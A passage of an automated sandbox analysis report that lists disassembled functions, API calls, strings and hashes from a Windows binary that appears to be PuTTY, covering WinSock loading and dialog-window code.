                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 429682c95cb6291783ec288c78264faea4b11727d7be351ccb1e330921a9275d
                    • Instruction ID: 36530c8f5b20bbc60e1646229ab178f087f592374d0ae0a895afe43570f8fdf3
                    • Opcode Fuzzy Hash: 429682c95cb6291783ec288c78264faea4b11727d7be351ccb1e330921a9275d
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE4B50 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 372libraryloadernetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 be4b50-be4b69 call beb850 3 be4b6b-be4b7f call beb850 0->3 4 be4b85-be4b93 GetProcAddress 0->4 3->4 14 be51a0-be51a5 call bb5330 3->14 6 be4b95-be4b9c 4->6 7 be4bd1-be4be5 call beb850 4->7 9 be4c2a 6->9 10 be4ba2-be4bbb GetProcAddress 6->10 16 be4be7-be4bff GetProcAddress 7->16 17 be4c45-be4c4c 7->17 13 be4c34 9->13 10->13 15 be4bbd-be4bcf GetProcAddress 10->15 19 be4c3e 13->19 22 be51aa-be51d4 call bb5330 14->22 20 be4c13-be4c1a 15->20 16->13 21 be4c01-be4c0d GetProcAddress 16->21 25 be4c4e-be4c5a GetProcAddress 17->25 26 be4c5c 17->26 24 be4c40 19->24 20->19 23 be4c1c-be4c28 GetProcAddress 20->23 21->20 32 be51ec-be51ed 22->32 33 be51d6-be51db 22->33 23->24 24->17 28 be4c5e-be4c6a 25->28 26->28 30 be5004 28->30 31 be4c70-be4c89 GetProcAddress 28->31 34 be500e 30->34 31->34 35 be4c8f-be4ca8 GetProcAddress 31->35 33->32 36 be51dd-be51e4 33->36 37 be5018 34->37 35->37 38 be4cae-be4cc7 GetProcAddress 35->38 36->32 41 be51e6-be51e9 36->41 40 be5022 37->40 39 be4ccd-be4ce6 GetProcAddress 38->39 38->40 42 be502c 39->42 43 be4cec-be4d05 GetProcAddress 39->43 40->42 41->32 44 be5036 42->44 43->44 45 be4d0b-be4d24 GetProcAddress 43->45 46 be5040 44->46 45->46 47 be4d2a-be4d43 GetProcAddress 45->47 48 be504a 46->48 47->48 49 be4d49-be4d62 GetProcAddress 47->49 50 be5054 48->50 49->50 51 be4d68-be4d81 GetProcAddress 49->51 52 be505e 50->52 51->52 53 be4d87-be4da0 GetProcAddress 51->53 54 be5068 52->54 53->54 55 be4da6-be4dbf GetProcAddress 53->55 56 be5072 54->56 55->56 57 be4dc5-be4dde GetProcAddress 55->57 58 be507c 56->58 57->58 59 be4de4-be4dfd GetProcAddress 57->59 60 be5086 58->60 59->60 61 be4e03-be4e1c GetProcAddress 59->61 62 be5090 60->62 61->62 63 be4e22-be4e3b GetProcAddress 61->63 64 be509a 62->64 63->64 65 be4e41-be4e5a GetProcAddress 63->65 66 be50a4 64->66 65->66 67 be4e60-be4e79 GetProcAddress 65->67 68 be50ae 66->68 67->68 69 be4e7f-be4e98 GetProcAddress 67->69 70 be50b8 68->70 69->70 71 be4e9e-be4eb7 GetProcAddress 69->71 73 be50c2 70->73 72 be4ebd-be4ed6 GetProcAddress 71->72 71->73 74 be50cc 72->74 75 be4edc-be4ef5 GetProcAddress 72->75 73->74 76 be50d6 74->76 75->76 77 be4efb-be4f14 GetProcAddress 75->77 78 be50e0 76->78 77->78 79 be4f1a-be4f33 GetProcAddress 77->79 80 be50ea 78->80 79->80 81 be4f39-be4f52 GetProcAddress 79->81 82 be50f4 80->82 81->82 83 be4f58-be4f71 GetProcAddress 81->83 84 be50fe 82->84 83->84 85 be4f77-be4f90 GetProcAddress 83->85 86 be5108 84->86 85->86 87 be4f96-be4faf GetProcAddress 85->87 88 be5112 86->88 87->88 89 be4fb5-be4fce GetProcAddress 87->89 90 be511c 88->90 89->90 91 be4fd4-be4fed GetProcAddress 89->91 92 be5126 90->92 91->92 93 be4ff3-be4fff GetProcAddress 91->93 94 be5128-be513f WSAStartup 92->94 93->94 95 be514e-be515d WSAStartup 94->95 96 be5141-be514c 94->96 98 be515f-be516a 95->98 99 be516c-be517e WSAStartup 95->99 96->95 97 be518d-be519f call bea210 96->97 98->97 98->99 99->22 101 be5180-be518b 99->101 101->22 101->97
                    APIs
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00BE4B8B
                    • GetProcAddress.KERNEL32(74160000,getaddrinfo), ref: 00BE4BA8
                    • GetProcAddress.KERNEL32(74160000,freeaddrinfo), ref: 00BE4BC3
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00BE4BED
                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00BE4C07
                    • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 00BE4C22
                    • GetProcAddress.KERNEL32(74160000,WSAAddressToStringA), ref: 00BE4C54
                    • GetProcAddress.KERNEL32(74160000,WSAAsyncSelect), ref: 00BE4C76
                    • GetProcAddress.KERNEL32(74160000,WSAEventSelect), ref: 00BE4C95
                    • GetProcAddress.KERNEL32(74160000,select), ref: 00BE4CB4
                    • GetProcAddress.KERNEL32(74160000,WSAGetLastError), ref: 00BE4CD3
                    • GetProcAddress.KERNEL32(74160000,WSAEnumNetworkEvents), ref: 00BE4CF2
                    • GetProcAddress.KERNEL32(74160000,WSAStartup), ref: 00BE4D11
                    • GetProcAddress.KERNEL32(74160000,WSACleanup), ref: 00BE4D30
                    • GetProcAddress.KERNEL32(74160000,closesocket), ref: 00BE4D4F
                    • GetProcAddress.KERNEL32(74160000,ntohl), ref: 00BE4D6E
                    • GetProcAddress.KERNEL32(74160000,htonl), ref: 00BE4D8D
                    • GetProcAddress.KERNEL32(74160000,htons), ref: 00BE4DAC
                    • GetProcAddress.KERNEL32(74160000,ntohs), ref: 00BE4DCB
                    • GetProcAddress.KERNEL32(74160000,gethostname), ref: 00BE4DEA
                    • GetProcAddress.KERNEL32(74160000,gethostbyname), ref: 00BE4E09
                    • GetProcAddress.KERNEL32(74160000,getservbyname), ref: 00BE4E28
                    • GetProcAddress.KERNEL32(74160000,inet_addr), ref: 00BE4E47
                    • GetProcAddress.KERNEL32(74160000,inet_ntoa), ref: 00BE4E66
                    • GetProcAddress.KERNEL32(74160000,inet_ntop), ref: 00BE4E85
                    • GetProcAddress.KERNEL32(74160000,connect), ref: 00BE4EA4
                    • GetProcAddress.KERNEL32(74160000,bind), ref: 00BE4EC3
                    • GetProcAddress.KERNEL32(74160000,setsockopt), ref: 00BE4EE2
                    • GetProcAddress.KERNEL32(74160000,socket), ref: 00BE4F01
                    • GetProcAddress.KERNEL32(74160000,listen), ref: 00BE4F20
                    • GetProcAddress.KERNEL32(74160000,send), ref: 00BE4F3F
                    • GetProcAddress.KERNEL32(74160000,shutdown), ref: 00BE4F5E
                    • GetProcAddress.KERNEL32(74160000,ioctlsocket), ref: 00BE4F7D
                    • GetProcAddress.KERNEL32(74160000,accept), ref: 00BE4F9C
                    • GetProcAddress.KERNEL32(74160000,getpeername), ref: 00BE4FBB
                    • GetProcAddress.KERNEL32(74160000,recv), ref: 00BE4FDA
                    • GetProcAddress.KERNEL32(74160000,WSAIoctl), ref: 00BE4FF9
                    • WSAStartup.WS2_32(00000202,00CB2C54), ref: 00BE5137
                    • WSAStartup.WS2_32(00000002,00CB2C54), ref: 00BE5155
                    • WSAStartup.WS2_32(00000101,00CB2C54), ref: 00BE5176
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc$Startup$LibraryLoad
                    • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
                    • API String ID: 1450042416-3487058210
                    • Opcode ID: f51ba4aa0c0bfce657cbf2c63605d50073e1cf5568a757c86ddbe257850cda5f
                    • Instruction ID: 70cc154aa825624041b86d75c628a7073201e7e4b1c8544a3ae76fdb88657ff4
                    • Opcode Fuzzy Hash: f51ba4aa0c0bfce657cbf2c63605d50073e1cf5568a757c86ddbe257850cda5f
                    • Instruction Fuzzy Hash: 99E1DDB46417429BEB299F26EC69B2E3BA5FB04309F044B6DF813936E1DF75D4048B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCD790 Relevance: 65.4, APIs: 28, Strings: 9, Instructions: 605windowtimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 103 bcd790-bcd7cf 104 bcd7d5-bcd7db 103->104 105 bcdb70-bcdb78 103->105 106 bcdca0-bcdca5 104->106 107 bcd7e1-bcd7e7 104->107 108 bcdb7e-bcdb85 105->108 109 bcde8a-bcde98 call c4dc50 105->109 106->109 113 bcdcab-bcdcb2 106->113 111 bcd7ed-bcd82e call bcf180 call bcf6e0 call bf83c0 107->111 112 bcdd01-bcdd22 call bcf1e0 call c4dc50 107->112 108->109 110 bcdb8b-bcdb92 108->110 124 bcde9a-bcdea4 109->124 110->109 115 bcdb98-bcdbf6 SendMessageA * 3 call bd0640 110->115 148 bcd879-bcd9f5 LoadIconA SendMessageA call bf93a0 MapDialogRect CreateWindowExA SendMessageA * 2 MapDialogRect CreateWindowExA SendMessageA * 2 111->148 149 bcd830-bcd836 111->149 112->124 113->109 118 bcdcb8-bcdcd5 KillTimer call bebe30 113->118 129 bcdbfc-bcdc17 115->129 130 bcdea5-bcdee1 call bcf6e0 call bf83c0 115->130 133 bcdcd7-bcdcee MessageBoxA call be9100 118->133 134 bcdcf1-bcdcfc call bf8140 118->134 135 bcdc71-bcdc75 129->135 158 bcdf25-bcdf5e call bd3bc0 SendMessageA InvalidateRect SetFocus 130->158 159 bcdee3-bcdee5 130->159 133->134 134->109 140 bcdc77-bcdc79 135->140 141 bcdc20-bcdc6b call bd0440 call bd05b0 call be9100 * 2 call bd0640 135->141 146 bcdc88-bcdc99 GetDlgItem 140->146 141->130 141->135 151 bcdc9b-bcdc9e DestroyWindow 146->151 152 bcdc80-bcdc86 146->152 162 bcdd49-bcdd59 SendMessageA 148->162 163 bcd9fb-bcda12 148->163 154 bcd840-bcd877 call bd0660 call bf83c0 149->154 151->152 152->141 152->146 154->148 158->109 164 bcdef0-bcdf23 call bd0660 call bf83c0 159->164 170 bcdd5d-bcdd74 call c5d413 162->170 168 bcda69-bcda74 163->168 164->158 176 bcda5b-bcda63 168->176 177 bcda76-bcda78 168->177 188 bcdd76-bcddae call bcf6e0 call bf83c0 170->188 176->168 181 bcdd27-bcdd45 SendMessageA 176->181 183 bcda7a-bcda89 call bf81c0 177->183 184 bcdaa0 177->184 181->188 189 bcdd47 181->189 198 bcda8b-bcda8f 183->198 199 bcda54 183->199 186 bcdaa2-bcdab0 call bf8190 184->186 201 bcdac9-bcdae0 call c50c40 186->201 202 bcdab2-bcdac6 call c5d413 186->202 207 bcddf4-bcde08 call bd3bc0 188->207 208 bcddb0-bcddb2 188->208 189->170 198->186 199->176 213 bcdae8 201->213 214 bcdae2-bcdae6 201->214 202->201 219 bcde0a-bcde1d SetTimer 207->219 220 bcde23-bcde3c call bd0640 207->220 211 bcddc0-bcddf2 call bd0660 call bf83c0 208->211 211->207 217 bcdaed-bcdb38 _strlen SendMessageA 213->217 214->217 221 bcdb3e-bcdb65 SendMessageA 217->221 222 bcda14 217->222 219->220 232 bcde3e-bcde43 220->232 233 bcde78-bcde83 ShowWindow 220->233 223 bcda18-bcda39 call c509b0 221->223 226 bcdb6b 221->226 222->223 230 bcda3c-bcda50 223->230 226->230 230->199 234 bcde50-bcde54 232->234 233->109 235 bcde6e-bcde75 call bd3ab0 234->235 236 bcde56-bcde6a call bd0640 234->236 235->233 236->234 241 bcde6c 236->241 241->233
                    APIs
                    • LoadIconA.USER32(000000C9), ref: 00BCD888
                    • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BCD8A4
                    • MapDialogRect.USER32(?,00000003), ref: 00BCD8DB
                    • CreateWindowExA.USER32 ref: 00BCD91E
                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCD933
                    • SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00BCD93B
                    • MapDialogRect.USER32(?,00000003), ref: 00BCD965
                    • CreateWindowExA.USER32 ref: 00BCD9B2
                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCD9C1
                    • SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00BCD9C9
                    • _strrchr.LIBCMT ref: 00BCDACE
                    • _strlen.LIBCMT ref: 00BCDB06
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00BCDB32
                    • SendMessageA.USER32(?,00001102,-00000001,?), ref: 00BCDB56
                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BCDBA9
                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00BCDBB6
                    • SendMessageA.USER32(?,0000110C,00000000,00000005), ref: 00BCDBE2
                    • GetDlgItem.USER32 ref: 00BCDC95
                    • DestroyWindow.USER32(00000000), ref: 00BCDC9C
                    • KillTimer.USER32(?,000004CE), ref: 00BCDCBE
                    • MessageBoxA.USER32 ref: 00BCDCE2
                    • SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 00BCDD36
                    • SetTimer.USER32(?,000004CE,000003E8,00000000), ref: 00BCDE1D
                      • Part of subcall function 00BCF180: SetWindowTextA.USER32(?,?), ref: 00BCF18F
                      • Part of subcall function 00BCF180: GetWindowLongA.USER32 ref: 00BCF1A1
                      • Part of subcall function 00BCF180: SetWindowLongA.USER32 ref: 00BCF1B0
                      • Part of subcall function 00BCF6E0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCF70B
                      • Part of subcall function 00BCF6E0: GetClientRect.USER32(?,?), ref: 00BCF71D
                      • Part of subcall function 00BCF6E0: MapDialogRect.USER32(?), ref: 00BCF746
                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BCDF3E
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BCDF49
                    • SetFocus.USER32(?), ref: 00BCDF58
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$Send$Window$Rect$Dialog$CreateLongTimer$ClientDestroyFocusIconInvalidateItemKillLoadText_strlen_strrchr
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$b$firstpath$j == ctrl_path_elements(s->pathname) - 1
                    • API String ID: 3050031257-2030196855
                    • Opcode ID: 3715bed321de193834dc28282b393bd4108682b14d4590fd0b831f27624f8b95
                    • Instruction ID: 844b92db2e1d90dffca24d6c07d5f0ca4c6365a0b75fb7ac51b3fd3ce7c6f47d
                    • Opcode Fuzzy Hash: 3715bed321de193834dc28282b393bd4108682b14d4590fd0b831f27624f8b95
                    • Instruction Fuzzy Hash: C51204B5604345AFEB209F24DC86F6FB7E5EB84704F00487DFA499B2A1D7B1A904CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BF7FA0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 88windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • LoadCursorA.USER32 ref: 00BF7FF9
                    • RegisterClassA.USER32 ref: 00BF801C
                    • CreateDialogParamA.USER32(?,?,?,00BF80F0,00000000), ref: 00BF805B
                    • SetWindowLongA.USER32 ref: 00BF8067
                    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BF809E
                    • IsDialogMessageA.USER32(00000000,?,?,00000000,00000000,00000000), ref: 00BF80AD
                    • DispatchMessageA.USER32 ref: 00BF80B4
                    • PostQuitMessage.USER32(?,?,00000000,00000000,00000000), ref: 00BF80C2
                    • DestroyWindow.USER32(00000000,?,00000000,00000000,00000000), ref: 00BF80C9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$DialogWindow$CallbackClassCreateCursorDestroyDispatchDispatcherLoadLongParamPostQuitRegisterUser
                    • String ID: "
                    • API String ID: 1405747859-123907689
                    • Opcode ID: 7345fd44d0d28b25adb4d36a74d7e8500e2865165a01e9e5a1f5be5f66b83baa
                    • Instruction ID: 2bf1db126c9ad3b341d3dd968d75bce3a6c7e95ef2f2c54ea48b1dc55205809f
                    • Opcode Fuzzy Hash: 7345fd44d0d28b25adb4d36a74d7e8500e2865165a01e9e5a1f5be5f66b83baa
                    • Instruction Fuzzy Hash: 0F311BB05483449FD7209F24DD48B5FBBF4FB8A708F50480DFA9A97290CB75A808CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCF780 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 316 bcf780-bcf7c7 MapDialogRect 317 bcf7c9-bcf813 CreateWindowExA SendMessageA call c60d80 316->317 318 bcf83b 316->318 321 bcf818-bcf81d 317->321 320 bcf83d-bcf850 call c4dc50 318->320 321->320 323 bcf81f-bcf839 SetWindowPos 321->323 323->320
                    APIs
                    • MapDialogRect.USER32(?), ref: 00BCF7BD
                    • CreateWindowExA.USER32 ref: 00BCF7F7
                    • SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00BCF807
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116,?,?,BUTTON,50000007,00000000,00CA133C,?), ref: 00BCF833
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$CreateDialogMessageRectSend
                    • String ID: LISTBOX
                    • API String ID: 4261271132-1812161947
                    • Opcode ID: 945cd8f75cb03f855e744c7f28ca5376386e86f28fece0c97ae9d5a90ad31bc2
                    • Instruction ID: 86376cc3cbd02495b128cccf57b1c65c71235e656b4da50e44c859b30773e35e
                    • Opcode Fuzzy Hash: 945cd8f75cb03f855e744c7f28ca5376386e86f28fece0c97ae9d5a90ad31bc2
                    • Instruction Fuzzy Hash: 002123B2608301AFDB019FA4DC81F5BBBE5FF88744F10491CFA9697260C371A821DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCF180 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 325 bcf180-bcf18b 326 bcf18d-bcf18f SetWindowTextA 325->326 327 bcf195-bcf19c call bbb3a0 325->327 326->327 330 bcf19e-bcf1b7 GetWindowLongA SetWindowLongA 327->330 331 bcf1b8-bcf1c6 GetDlgItem 327->331 332 bcf1cf-bcf1d0 331->332 333 bcf1c8-bcf1c9 DestroyWindow 331->333 333->332
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$Long$DestroyItemText
                    • String ID:
                    • API String ID: 4119185043-0
                    • Opcode ID: c750b904ac3c1daab98fb834842e1eb273a1c3cae91f10a15edcaa66d86d4a64
                    • Instruction ID: a9d371ddeeb31ec94c4b92ec2d399ab5c04ac0bc14fd39acbc3548174df0e0bb
                    • Opcode Fuzzy Hash: c750b904ac3c1daab98fb834842e1eb273a1c3cae91f10a15edcaa66d86d4a64
                    • Instruction Fuzzy Hash: 3EE030B0505521ABD7016F25AC08FEE3A9CEF4B3297188694F41BE25A1D724890285A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD31A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 334 bd31a0-bd31ac 335 bd31ae-bd31b4 334->335 336 bd31e4 334->336 337 bd31c0-bd31d6 call beafa0 335->337 338 bd31e6-bd31fa call c5d413 336->338 343 bd325d-bd3266 337->343 344 bd31dc-bd31e2 337->344 345 bd31fd-bd3206 338->345 343->345 348 bd3268-bd326b 343->348 344->336 344->337 346 bd3228-bd322d 345->346 347 bd3208-bd3226 345->347 350 bd3232-bd325c SendDlgItemMessageA * 2 346->350 347->350 348->338 349 bd3271-bd3275 348->349 349->345 351 bd3277 349->351 351->338
                    APIs
                    • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BD3245
                    • SendDlgItemMessageA.USER32(?,?,00000151,00000000,?), ref: 00BD3256
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD31EB
                    • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BD31F0
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                    • API String ID: 3015471070-892283786
                    • Opcode ID: 2cb492fe290c2371406e65dac37e89dee3a9fe93b734151c07e89bc69cc2973d
                    • Instruction ID: fa944f7212fabeb03084813c8e440bf292b2049a893eb57b9df267073c06b2de
                    • Opcode Fuzzy Hash: 2cb492fe290c2371406e65dac37e89dee3a9fe93b734151c07e89bc69cc2973d
                    • Instruction Fuzzy Hash: 3C213670604206AFE7208B00DC81F36F3E5FB85B08F1001AAF50957792E772AE10CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD42C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 352 bd42c0-bd42c7 353 bd42c9-bd42d0 352->353 354 bd42e4-bd42f8 call beb850 352->354 356 bd4313-bd4315 353->356 357 bd42d2-bd42e3 call bbb160 SetCurrentProcessExplicitAppUserModelID 353->357 360 bd4308 354->360 361 bd42fa-bd4306 GetProcAddress 354->361 363 bd430a-bd4311 360->363 361->363 363->356 363->357
                    APIs
                    • SetCurrentProcessExplicitAppUserModelID.SHELL32(00000000,00BB46CA), ref: 00BD42D8
                    • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 00BD4300
                    Strings
                    • SetCurrentProcessExplicitAppUserModelID, xrefs: 00BD42FA
                    • Shell32.dll, xrefs: 00BD42E4
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressCurrentExplicitModelProcProcessUser
                    • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
                    • API String ID: 3773935857-666802935
                    • Opcode ID: e6bbb8784deb30cdd583669926a2755fc79c78adf502a6fb031e88a1d51531d7
                    • Instruction ID: e68d28c934af579d4269c39021ec127ed1f59196eb8424c6584bb127d7430774
                    • Opcode Fuzzy Hash: e6bbb8784deb30cdd583669926a2755fc79c78adf502a6fb031e88a1d51531d7
                    • Instruction Fuzzy Hash: 23E06D746002038BDF209F79AC58F1A72D8AB10361F0506B5F411C23A0FB34C400EB27
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEB9B0 Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
